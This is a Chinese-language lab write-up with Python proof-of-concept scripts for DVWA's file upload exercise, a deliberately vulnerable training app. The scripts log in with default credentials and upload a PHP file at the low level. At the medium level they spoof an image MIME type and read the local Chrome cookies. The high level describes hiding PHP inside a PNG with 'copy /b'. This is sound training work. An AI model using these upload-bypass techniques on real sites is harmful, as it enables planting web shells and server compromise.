POC——DVWA's File Upload
Level——low
最近了解了一下python的selenium,干脆用它写一个low级别的POC吧~
1 from selenium.webdriver import Chrome 2 from selenium.webdriver.support.ui import WebDriverWait 3 from selenium.webdriver.common.by import By 4 from selenium.webdriver.support.select import Select 5 import time 6 7 driver = Chrome() 8 driver.get("http://192.168.117.130/DVWA-1.9/login.php") 9 WebDriverWait(driver,10).until(lambda d:"Login" in d.title) 10 driver.find_element(By.XPATH,'//*[@id="content"]/form/fieldset/input[1]').send_keys("admin") 11 driver.find_element(By.XPATH,'//*[@id="content"]/form/fieldset/input[2]').send_keys("password") 12 driver.find_element(By.XPATH,'//*[@id="content"]/form/fieldset/p/input').click() 13 14 driver.find_element(By.XPATH,'//*[@id="main_menu_padded"]/ul[3]/li[1]').click() 15 driver.find_element(By.XPATH,'//*[@id="main_body"]/div/form/select').click() 16 loc = (By.XPATH,'//*[@id="main_body"]/div/form/select') 17 ele = driver.find_element(*loc) 18 s = Select(ele) 19 s.select_by_value("low") 20 driver.find_element(By.XPATH,'//*[@id="main_body"]/div/form/input[1]').click() 21 22 driver.find_element(By.XPATH,'//*[@id="main_menu_padded"]/ul[2]/li[5]').click() 23 driver.find_element(By.XPATH,'//*[@id="main_body"]/div/div/form/input[2]').send_keys('/path/one.php') 24 driver.find_element(By.XPATH,'//*[@id="main_body"]/div/div/form/input[3]').click() 25 response = driver.find_element(By.XPATH,'//*[@id="main_body"]/div/div/pre') 26 27 re = 'one.php' 28 flag=re in str(response.text) 29 30 if flag: 31 print("It looks likely vulnerable") 32 else: 33 print("It is strong") 34 35 driver.close()
Level-Medium
1 import requests 2 from requests_toolbelt.multipart.encoder import MultipartEncoder 3 import browser_cookie3 4 5 cookie = browser_cookie3.chrome() 6 URL = 'http://192.168.117.130/DVWA-1.9/vulnerabilities/upload/' 7 fl = open("one.php","rb") 8 m = MultipartEncoder( 9 fields={'MAX_FILE_SIZE': '100000', 10 'uploaded': ('one.php',fl,'image/png'), 11 'Upload': 'Upload' 12 }) 13 14 headers = { 15 "Content-Type": m.content_type 16 } 17 response = requests.post(URL, data=m, headers=headers,cookies=cookie) 18 19 re = 'one.php' 20 flag=re in str(response.content) 21 22 if flag: 23 print("It looks likely vulnerable") 24 else: 25 print("It is strong")
另:之前在这里遇到了不少问题,单单是处理这些问题就花费了好长时间,现在记录一下:
- 此处浏览器的Content-Type是multipart/form-data,这个类型很有意思也很有特点,post传参形式没有变,只是把“data:vlaue”形式变成了一串随机生成的遗传字符串作为分隔符,分隔符内定义了各种参数以及文件内容的二进制,所以构造post请求的时候需要用到多文件上传(MultipartEncoder)的包(也有别的方法,为了以后方便,这里就用了这个),链接放在这里;
- 看到网上有很多multipart/form-data类型上传文件时,都用到了token这个值,但是我没有从我的抓取到的包中找到,网上查了一下,可能是DVWA没有定义token这个键值,不过同样是身份验证的话,cookie也有相同作用,cookie、session、token区别放在这里;
- request请求数据后,会自动进行url编码
Level-High
这里就是多加了一个cmd下copy one.png /b + one.txt /a two.png的图片隐写过程(因为high级别对文件大小进行了限制),然后将新的到的two.png传入。这个涉及到后面的文件包含,这里就不写了~
